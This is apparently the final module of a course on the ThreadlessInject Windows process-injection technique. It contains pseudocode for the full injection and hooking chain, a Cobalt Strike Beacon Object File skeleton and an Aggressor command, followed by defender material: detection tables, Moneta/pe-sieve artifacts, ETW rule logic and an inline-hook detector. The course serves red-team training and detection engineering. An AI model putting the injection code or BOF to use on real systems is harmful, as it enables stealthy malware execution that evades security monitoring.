Module 8: Full Chain, BOF Integration & Detection
The complete flow from target selection to payload execution, plus how defenders catch it.
Putting It All Together
This final module walks through the entire ThreadlessInject chain end-to-end, demonstrates how it integrates with Cobalt Strike as a Beacon Object File (BOF), and then switches perspective to the defender to examine every detection opportunity across the kill chain. Understanding both sides is essential for building effective offensive tools and for conducting realistic detection engineering.
The Complete Injection Chain
Here is the full sequence of operations that ThreadlessInject performs, from start to finish. Each step references the module where it was covered in detail:
ThreadlessInject: End-to-End Flow
C++// ThreadlessInject: Complete implementation pseudocode
bool ThreadlessInject(DWORD pid, const char* dllName, const char* funcName,
BYTE* shellcode, SIZE_T shellcodeLen) {
// Step 1: Open target process
HANDLE hProc = OpenProcess(
PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ,
FALSE, pid);
if (!hProc) return false;
// Step 2: Resolve target function address
HMODULE hDll = GetModuleHandleA(dllName);
FARPROC funcAddr = GetProcAddress(hDll, funcName);
// Step 3: Read original bytes
BYTE originalBytes[14];
NtReadVirtualMemory(hProc, funcAddr, originalBytes, 14, NULL);
// Step 4: Calculate total size and allocate remote memory
SIZE_T stubSize = CalculateStubSize();
SIZE_T totalSize = stubSize + shellcodeLen + 14 + 14 + 4; // stub+sc+orig+jmpback+guard
PVOID remoteMem = NULL;
NtAllocateVirtualMemory(hProc, &remoteMem, 0, &totalSize,
MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
// Step 5: Build complete payload locally
BYTE* payload = BuildPayload(remoteMem, funcAddr, shellcode,
shellcodeLen, originalBytes);
// Step 6: Write to remote process
NtWriteVirtualMemory(hProc, remoteMem, payload, totalSize, NULL);
// Step 7: Change payload protection to RX
ULONG oldProt;
NtProtectVirtualMemory(hProc, &remoteMem, &totalSize,
PAGE_EXECUTE_READ, &oldProt);
// Step 8-10: Install the hook (change prot, write JMP, restore prot)
BYTE hookJmp[14];
BuildAbsoluteJmp(hookJmp, (UINT64)remoteMem); // JMP to hook stub
PVOID funcPage = (PVOID)funcAddr;
SIZE_T pageSize = 14;
NtProtectVirtualMemory(hProc, &funcPage, &pageSize,
PAGE_EXECUTE_READWRITE, &oldProt);
NtWriteVirtualMemory(hProc, funcAddr, hookJmp, 14, NULL);
NtProtectVirtualMemory(hProc, &funcPage, &pageSize,
oldProt, &oldProt);
// Steps 11-12 happen asynchronously in the target process
printf("[+] Hook installed. Waiting for target thread to trigger...\n");
// Optionally: monitor guard flag and restore original bytes
CloseHandle(hProc);
free(payload);
return true;
}
Cobalt Strike BOF Integration
A Beacon Object File (BOF) is a compiled C object file (.o) that Cobalt Strike can load and execute directly within the Beacon process. BOFs are used for post-exploitation actions because they run in-process (no new process creation) and can use the Beacon's existing communication channel. A BOF implementation of ThreadlessInject was created by iilegacyyii (Jordan Jay) as a community port of CCob's original C# technique, allowing operators to perform threadless injection from a Cobalt Strike Beacon.
BOF Architecture
BOFs use a special API provided by Cobalt Strike's Beacon runtime. They cannot use the standard C runtime library (no printf, malloc, etc.). Instead, they use Beacon API functions for output, memory management, and dynamic function resolution:
C// BOF entry point for ThreadlessInject
// Uses Beacon's Dynamic Function Resolution (DFR) for API calls
#include "beacon.h"
// Declare the Windows APIs we need via DFR
DECLSPEC_IMPORT HANDLE WINAPI KERNEL32$OpenProcess(DWORD, BOOL, DWORD);
DECLSPEC_IMPORT HMODULE WINAPI KERNEL32$GetModuleHandleA(LPCSTR);
DECLSPEC_IMPORT FARPROC WINAPI KERNEL32$GetProcAddress(HMODULE, LPCSTR);
// NTDLL native APIs
DECLSPEC_IMPORT NTSTATUS NTAPI NTDLL$NtAllocateVirtualMemory(HANDLE, PVOID*, ULONG_PTR, PSIZE_T, ULONG, ULONG);
DECLSPEC_IMPORT NTSTATUS NTAPI NTDLL$NtWriteVirtualMemory(HANDLE, PVOID, PVOID, SIZE_T, PSIZE_T);
DECLSPEC_IMPORT NTSTATUS NTAPI NTDLL$NtProtectVirtualMemory(HANDLE, PVOID*, PSIZE_T, ULONG, PULONG);
DECLSPEC_IMPORT NTSTATUS NTAPI NTDLL$NtReadVirtualMemory(HANDLE, PVOID, PVOID, SIZE_T, PSIZE_T);
void go(char* args, int alen) {
// Parse arguments from Cobalt Strike
datap parser;
BeaconDataParse(&parser, args, alen);
int pid = BeaconDataInt(&parser);
char* dllName = BeaconDataExtract(&parser, NULL);
char* funcName = BeaconDataExtract(&parser, NULL);
int scLen = 0;
char* shellcode = BeaconDataExtract(&parser, &scLen);
BeaconPrintf(CALLBACK_OUTPUT,
"[*] ThreadlessInject: PID=%d, DLL=%s, Func=%s, SC=%d bytes",
pid, dllName, funcName, scLen);
// Execute the threadless injection chain
// (same logic as standalone, using DFR API calls)
HANDLE hProc = KERNEL32$OpenProcess(
PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ,
FALSE, pid);
if (!hProc) {
BeaconPrintf(CALLBACK_ERROR, "[-] Failed to open process %d", pid);
return;
}
// ... (complete injection chain using NTDLL$ prefixed functions)
BeaconPrintf(CALLBACK_OUTPUT, "[+] Hook installed successfully");
}
Aggressor Script Integration
The BOF is loaded into Cobalt Strike via an Aggressor script that defines a new command for the operator:
Aggressor# ThreadlessInject Aggressor script
# Registers the 'threadlessinject' command in Cobalt Strike
alias threadlessinject {
local('$pid $dll $func $shellcode $bof');
$pid = $2; # Target PID
$dll = $3; # DLL containing target function
$func = $4; # Export function name to hook
# Generate shellcode for the target architecture
$shellcode = shellcode($1, false, "x64");
# Read the compiled BOF
$bof = readbof("ThreadlessInject.o");
# Pack arguments and execute the BOF
btask($1, "Threadless Inject into PID $pid via $dll!$func");
beacon_inline_execute($1, $bof, "go",
bof_pack($1, "izzb", $pid, $dll, $func, $shellcode));
}
# Usage from Cobalt Strike console:
# threadlessinject 1234 ntdll.dll NtWaitForSingleObject
BOF Advantages
Running ThreadlessInject as a BOF has significant operational advantages. The BOF runs inside the existing Beacon process, so there is no new process creation (which would trigger PsSetCreateProcessNotifyRoutine callbacks). The BOF uses Beacon's in-memory execution, so there is no file written to disk. And because the BOF communicates results back through Beacon's existing C2 channel, there is no new network connection to create or monitor.
Detection Vectors
Now we switch to the defender's perspective. While ThreadlessInject avoids thread creation telemetry, it is not invisible. Here are the detection opportunities at each stage of the kill chain:
| Stage | Detection Method | Telemetry Source | Difficulty |
|---|---|---|---|
| OpenProcess | Cross-process handle with VM rights | ObRegisterCallbacks (kernel) | Medium |
| NtAllocateVirtualMemory | Remote allocation of private memory | ETW: Microsoft-Windows-Kernel-Memory | Medium |
| NtWriteVirtualMemory | Cross-process memory write | ETW: Microsoft-Windows-Kernel-Memory | Medium |
| NtProtectVirtualMemory | RW→RX transition on private memory | ETW: VirtualProtect events | High (many false positives) |
| Prologue overwrite | Modified DLL code page (COW violation) | Memory scanning, page hash comparison | High |
| Hook stub in memory | RX private memory with no backing image | Memory scanning (Moneta, pe-sieve) | Medium |
| Modified function entry | Inline hook detection on known exports | Hook scanning (HookShark, etc.) | Medium |
Memory Scanning Detection
Memory scanners like Moneta and pe-sieve are among the most effective detection tools against ThreadlessInject. They detect two key artifacts:
1. Unbacked Executable Memory
ThreadlessInject allocates private memory (not backed by a DLL file) and marks it as executable. Memory scanners enumerate all memory regions and flag any that are executable but not backed by a known image file on disk. This is the hook stub + shellcode region.
C++// What Moneta detects:
// Region at 0x00000213A0010000:
// Type: MEM_PRIVATE (not backed by a file)
// Protection: PAGE_EXECUTE_READ
// Size: 4096 bytes
// Backing: NONE (no image file)
// VERDICT: Suspicious - private executable memory without backing image
// Defender query using Moneta:
// moneta64.exe -p <target_pid>
// Output shows all private executable regions that have no backing DLL/EXE
2. Modified Code Pages (Copy-on-Write)
When ThreadlessInject overwrites the target function's prologue, it triggers a copy-on-write (COW) fault. DLL code pages are normally shared across all processes (mapped from the same physical memory). When one process writes to a shared page, Windows creates a private copy for that process. Scanners like pe-sieve detect these private copies by comparing the in-memory code with the on-disk DLL file. Any differences indicate code modification (i.e., a hook).
pe-sieve Detection
Running pe-sieve against the target process after ThreadlessInject is installed will show a hook detected alert on the target DLL. The tool compares the in-memory bytes of every loaded DLL against the on-disk file and reports any discrepancies. The 14-byte modification at the target function's entry point is immediately flagged. Even after the hook is cleaned up (original bytes restored), the COW page may still exist (though its contents will match the on-disk file again).
ETW-Based Detection
Event Tracing for Windows provides several relevant providers for detecting ThreadlessInject's operations:
C++// Key ETW providers for detection:
// 1. Microsoft-Windows-Kernel-Process
// Events: ProcessStart, ThreadStart
// ThreadlessInject avoidance: No ThreadStart event (no new thread!)
// But: OpenProcess events are still logged
// 2. Microsoft-Windows-Kernel-Memory
// Events: VirtualAlloc, VirtualProtect cross-process
// Detection: Remote VirtualAlloc + VirtualProtect sequence
// Pattern: NtAllocateVirtualMemory(remoteHandle, ..., PAGE_READWRITE)
// followed by NtProtectVirtualMemory(..., PAGE_EXECUTE_READ)
// 3. Microsoft-Windows-Threat-Intelligence (TI provider)
// Requires PPL (Protected Process Light) to access
// Events: NtWriteVirtualMemory, NtProtectVirtualMemory cross-process
// This is the most comprehensive source but requires kernel-level access
// Detection rule pseudocode:
// IF process_A calls NtAllocateVirtualMemory on process_B
// AND process_A calls NtWriteVirtualMemory on process_B
// AND process_A calls NtProtectVirtualMemory on process_B (RW->RX)
// AND NO NtCreateThreadEx or CreateRemoteThread follows
// THEN: Possible threadless injection (high confidence)
Inline Hook Detection
Dedicated hook detection tools scan all loaded DLLs for inline hooks by examining the first bytes of exported functions. A JMP instruction at the very beginning of a function (especially to private memory) is a strong indicator of an inline hook:
C++// Simple inline hook detection: check first bytes of exported functions
bool DetectInlineHook(HMODULE hModule, const char* funcName) {
FARPROC funcAddr = GetProcAddress(hModule, funcName);
if (!funcAddr) return false;
BYTE* bytes = (BYTE*)funcAddr;
// Check for JMP [RIP+0] pattern: FF 25 00 00 00 00
if (bytes[0] == 0xFF && bytes[1] == 0x25 &&
*(DWORD*)(bytes + 2) == 0) {
UINT64 target = *(UINT64*)(bytes + 6);
// Check if jump target is in private (non-image) memory
MEMORY_BASIC_INFORMATION mbi;
VirtualQuery((PVOID)target, &mbi, sizeof(mbi));
if (mbi.Type == MEM_PRIVATE) {
printf("[!] HOOK DETECTED: %s -> 0x%llx (private memory)\n",
funcName, target);
return true;
}
}
// Check for relative JMP: E9 xx xx xx xx
if (bytes[0] == 0xE9) {
INT32 offset = *(INT32*)(bytes + 1);
UINT64 target = (UINT64)funcAddr + 5 + offset;
// Similar private memory check...
}
return false;
}
Detection Engineering Summary
Detection Coverage Map
Key Takeaway for Defenders
ThreadlessInject eliminates the thread creation signal, which was the easiest and most reliable detection for traditional injection. However, it cannot eliminate the need for cross-process memory operations (allocate, write, protect) or the resulting memory artifacts (unbacked executable memory, modified code pages). Detection strategies should focus on (1) memory scanning for private executable regions, (2) ETW monitoring for cross-process VirtualProtect patterns (especially RW→RX), and (3) periodic inline hook verification on critical system DLL exports.
Related Techniques
ThreadlessInject is part of a family of advanced injection techniques that avoid thread creation. PoolParty by SafeBreach uses Windows thread pool work items for execution. Mockingjay by SecurityJoes uses existing RWX sections in vulnerable DLLs to avoid memory allocation entirely. Understanding ThreadlessInject provides the foundation for understanding these related techniques, as they all address the same fundamental problem: triggering code execution without the detectable act of creating a thread.
Course Complete
You have completed the ThreadlessInject Masterclass. You now understand how threadless injection works at every level: from the detection problems with traditional injection, through the mechanics of remote function hooking, to the byte-level construction of hook stubs and the detection engineering perspective. Apply this knowledge responsibly.
Pop Quiz: Full Chain & Detection
Q1: Which detection method is MOST effective against ThreadlessInject?
Q2: What is the primary advantage of running ThreadlessInject as a Cobalt Strike BOF?
Q3: What causes a copy-on-write (COW) fault that pe-sieve can detect?